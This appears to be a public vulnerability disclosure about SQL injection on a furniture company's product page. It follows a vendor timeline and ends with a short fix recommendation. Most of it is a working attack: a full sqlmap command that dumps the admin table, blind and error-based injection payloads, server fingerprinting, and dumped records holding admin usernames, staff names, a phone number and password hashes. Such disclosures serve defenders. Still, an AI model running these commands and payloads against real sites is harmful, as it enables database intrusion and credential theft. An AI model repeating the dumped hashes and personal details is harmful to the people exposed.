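2015-12-03: Details reported to the vendor; awaiting vendor handling
2015-12-04: Vendor confirmed; details disclosed to the vendor only
2015-12-14: Details disclosed to core white hats and experts in related fields
2015-12-24: Details disclosed to regular white hats
2016-01-03: Details disclosed to intern white hats
2016-01-18: Details disclosed to the public
易利迪科 (Ezdeco, ezsy decoration), founded in 2006, is a professional company providing system furniture, kitchenware and renovation services. Knowing that home is the starting point of every possibility, we hope to offer you a friendly shopping environment through transparent, honest pricing, new renovation thinking, professional design, and attentive, smooth service.
URL: http://**.**.**.**/product.php?product_id=169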
$ python sqlmap.py -u "http://**.**.**.**/product.php?product_id=169" -p product_id --technique=BE --random-agent --batch --no-cast -D ezdecowww -T admin -C admin_id,password,phone,username,name,mail --dump --output-dir=output
Database: ezdecowww
Table: admin
[2 entries]
+----------+----------------------------------+---------------+----------+------+--------------------+
| admin_id | password                         | phone         | username | name | mail               |
+----------+----------------------------------+---------------+----------+------+--------------------+
| 1        | 46b2b3e13d79a5fec9ec0e09c563cd5a | (02)2827-9788 | ezdeco   | 工程師 | service@**.**.**.** |
| 2        | 9287dd0c77efbac55298c54e243beb18 |               | admin    | 左小姐 |                    |
+----------+----------------------------------+---------------+----------+------+--------------------+
---
Parameter: product_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: product_id=169' AND 4498=4498 AND 'Okvp'='Okvp

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: product_id=169' AND (SELECT 1933 FROM(SELECT COUNT(*),CONCAT(0x716b767a71,(SELECT (ELT(1933=1933,1))),0x7171716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wtjw'='wtjw
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
current user: 'ezdecowww@localhost'
current user is DBA: False
database management system users [1]:
[*] 'ezdecowww'@'localhost'

Database: ezdecowww
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| file                                  | 1082    |
| contact                               | 876     |
| contact_detail                        | 876     |
| contact_reply                         | 876     |
| product                               | 582     |
| product_detail                        | 581     |
| epaper_user                           | 412     |
| case_image                            | 204     |
| epaper_log_record                     | 90      |
| content                               | 66      |
| content_detail                        | 66      |
| page                                  | 63      |
| page_detail                           | 63      |
| epaper_log                            | 51      |
| model_block                           | 43      |
| config                                | 33      |
| product_categories                    | 27      |
| page_plate                            | 23      |
| `case`                                | 21      |
| model                                 | 14      |
| advertise_detail                      | 12      |
| file_categories                       | 11      |
| cache                                 | 6       |
| case_categories                       | 5       |
| contact_categories                    | 5       |
| epaper                                | 5       |
| epaper_detail                         | 5       |
| order_pay                             | 4       |
| content_categories                    | 3       |
| admin                                 | 2       |
| advertise                             | 2       |
| epaper_categories                     | 2       |
| forum                                 | 2       |
| member_level                          | 2       |
| autolink                              | 1       |
| order_freight                         | 1       |
+---------------------------------------+---------+

Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 572     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126     |
| COLLATIONS                            | 126     |
| STATISTICS                            | 111     |
| TABLES                                | 80      |
| KEY_COLUMN_USAGE                      | 60      |
| TABLE_CONSTRAINTS                     | 60      |
| CHARACTER_SETS                        | 36      |
| SCHEMATA                              | 2       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+

columns LIKE 'pass' were found in the following databases:
Database: ezdecowww
Table: admin
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+

Database: ezdecowww
Table: member
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+

Database: ezdecowww
Table: admin
[2 entries]
+----------------------------------+
| password                         |
+----------------------------------+
| 46b2b3e13d79a5fec9ec0e09c563cd5a |
| 9287dd0c77efbac55298c54e243beb18 |
+----------------------------------+

Database: ezdecowww
Table: member
[0 entries]
+----------+
| password |
+----------+
+----------+

Database: ezdecowww
Table: admin
[11 columns]
+----------+---------------------+
| Column   | Type                |
+----------+---------------------+
| level    | varchar(30)         |
| address  | varchar(100)        |
| admin_id | tinyint(3) unsigned |
| company  | varchar(30)         |
| mail     | varchar(60)         |
| name     | varchar(30)         |
| password | varchar(32)         |
| phone    | varchar(30)         |
| url      | varchar(100)        |
| username | varchar(50)         |
| within   | varchar(100)        |
+----------+---------------------+
Deploy a WAF.
Severity: High
Vulnerability Rank: 18
Confirmed at: 2015-12-04 20:47
Thank you for the report.
None yet.